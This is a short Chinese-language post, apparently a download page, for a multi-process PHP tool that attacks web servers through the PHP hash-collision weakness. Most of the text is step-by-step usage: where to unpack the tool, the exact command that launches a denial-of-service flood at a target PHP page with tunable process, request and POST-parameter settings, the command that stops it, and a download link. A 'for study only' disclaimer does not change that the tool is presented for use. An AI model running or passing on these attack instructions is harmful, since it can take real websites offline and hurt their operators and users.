PHP多線程版本HASH漏洞攻擊工具

   漏洞相關資訊： http://www.laruence.com/2011/12/30/2435.html

 

   系統要求：linux作業系統，PHP版本5及以上cli模式，多進程模式需要pctnl擴充支援。

 

  使用方式：  下載附件並解壓，例如解壓到 /usr/local/kalondos目錄下 

 

假如PHP命令路徑為:/usr/local/php5/bin/php 

 

開啟攻擊： /usr/local/php5/bin/php   /usr/local/kalondos/bin/dos.php 
www.xxxxxx.com/test.php  -n 8   -r 10000  -p  16

此時會提示父進程的一些執行流資訊，然後子進程開始發起攻擊，一般要等1分鐘左右可以看到子進程輸出相關資訊。

 

參數說明：

n: 子進程個數

r: 單個子進程請求次數

p:參數因子 為2的指數  控制POST參數數量，一般為16

 

關閉攻擊： /usr/local/php5/bin/php   /usr/local/kalondos/bin/dos.php 
www.xxxxxx.com/test.php  stop

 

 

 

目前是最精簡版，完善中..

 

僅供學習交流，如作它用，後果自負。

 

 http://download.csdn.net/download/phpkernel/3989492